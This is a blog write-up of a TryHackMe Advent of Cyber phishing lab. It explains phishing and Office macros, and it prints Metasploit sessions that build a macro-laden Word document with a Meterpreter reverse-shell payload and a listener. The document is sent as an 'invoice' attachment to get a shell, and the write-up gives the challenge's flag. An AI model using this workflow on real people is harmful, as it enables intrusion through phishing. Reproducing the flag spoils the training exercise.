The Advent of Cyber: Day 10: Phishing - He had a brain full of macros, and had shells in his soul. (TryHackMe)
In this article, we’ll cover Phishing - He had a brain full of macros and had shells in his soul writeup as the Day 2 challenge of the Advent of Cyber event challenge. It was interesting to navigate the platform and filter different events and logs based on timestamps, IP addresses, and the events, i.e., authentication, process, etc. We’re still at Wareville for SOC-mas!
First, read through the introduction to understanding concepts like Phishing and Macros as they’ll be fundamental here:
Phishing Attacks
Security is as strong as the weakest link. Many would argue that humans are the weakest link in the security chain. Is it easier to exploit a patched system behind a firewall or to convince a user to open an “important” document? Hence, “human hacking” is usually the easiest to accomplish and falls under social engineering.
Phishing is a play on the word fishing; however, the attacker is not after seafood. Phishing works by sending a “bait” to a usually large group of target users. Furthermore, the attacker often craft their messages with a sense of urgency, prompting target users to take immediate action without thinking critically, increasing the chances of success. The purpose is to steal personal information or install malware, usually by convincing the target user to fill out a form, open a file, or click a link.
One might get an email out of nowhere claiming that they are being charged a hefty sum and that they should check the details in the attached file or URL. The attacker just needs to have their target users open the malicious file or view the malicious link. This can trigger specific actions that would give the attack control over your system.
Macros
The needs of MS Office users can be vastly different, and there is no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks, such as formatting and inserting text or performing calculations. Consider the example of number-to-words conversion where a number such as “1337” needs to be expressed as “one thousand three hundred thirty-seven”. It would take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort.
In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cyber security, these automated programs can be hijacked for malicious purposes.
You’ll start the machine and open the terminal, we’ll be using Metasploit Framework a lot. We’ll use the command msfconsole
to launch it. In this first of the challenge a Microsoft word document will be created within our directories so we’ve to be keen
root@AttackBox:~# msfconsole
[...]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/fileformat/office_word_macro
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/office_word_macro) > set LHOST CONNECTION_IP
LHOST => CONNECTION_IP
msf6 exploit(multi/fileformat/office_word_macro) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/fileformat/office_word_macro) > show options
Module options (exploit/multi/fileformat/office_word_macro):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOMTEMPLATE no A docx file that will be used as a template to build the exploit
FILENAME msf.docm yes The Office document macro file (docm)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST CONNECTION_IP yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Microsoft Office Word on Windows
View the full module info with the info, or info -d command.
msf6 exploit(multi/fileformat/office_word_macro) > exploit
[*] Using template: /opt/metasploit-framework/embedded/framework/data/exploits/office_word_macro/template.docx
[*] Injecting payload in document comments
[*] Injecting macro and other required files in document
[*] Finalizing docm: msf.docm
[+] msf.docm stored at /root/.msf4/local/msf.docm
msf6 exploit(multi/fileformat/office_word_macro) > exit
If you open a new tab on the terminal and check /root/.msf4/local/msf.docm you’ll find the doc. Copy the doc into a new file within the root folder (this is optional)cd ./.msf4/local cp msf.docm /root/invoice.docm
there’s a part of the walkthrough where you just read through since we can’t access the Windows machine. The important part for us to find the flag is the second section where we’re using the Metasploit framework again but this time we won’t exit the exploit before we check the Windows directory.
root@AttackBox:~# msfconsole
[...]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST CONNECTION_IP
LHOST => CONNECTION_IP
msf6 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST CONNECTION_IP yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on CONNECTION_IP:8888
Finding the flag will be dependent on sending an email with the Microsoft Word document as an attachment. We’re given a URL to open the email together with the necessary credentials i.e. email & password together with the recipient’s email.
Once you’ve sent the email, the exploit will open up the Meterpreter which will allow us to access the Windows directory and we’ll be able to find the flag.txt file and cat flag.txt
to check its contents.
What is the flag value inside the
flag.txt
file that’s located on the Administrator’s desktop?THM{PHISHING_CHRISTMAS}
If you enjoyed this task, feel free to check out the Phishing module.
Thank you for reading through this article. You can leave a comment with your thoughts: areas to improve or other suggestions and questions if any. Till the next one, stay secure!